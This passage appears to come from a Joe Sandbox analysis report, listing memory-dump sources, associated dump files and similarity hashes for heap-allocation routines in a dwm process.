                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: aabc41e2585881794810aa1aff99d18bdc4fda7c78ffdf5e28400d38eda332ed
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: C2E0ED71621914DAE719DBA2D80C29976B1FB88B16F848034C90947751EE39849D9A11
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: 553541f89a224aee690aa4df97bcb4b95e3b9889be9fe25ac11f6ed954b914f4
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: C4E0E571711A18EAF72A9B62E80C25976B1FB8DB15F888164C90907B20EE3E84DD9B10
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448872342.00000262F1D31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D30000, based on PE: true
                                                  • Associated: 00000012.00000002.3448816247.00000262F1D30000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448971011.00000262F1D45000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449077595.00000262F1D50000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449181058.00000262F1D52000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449289748.00000262F1D59000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d30000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: 6f7cc1e419162efb08ca9a792295804387426de7163e8cc713263ddf515316d3
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: DCE0E571611A18EAE7289B62D90D25976B1FB88B55F888164C94907B20EE3A849D9B20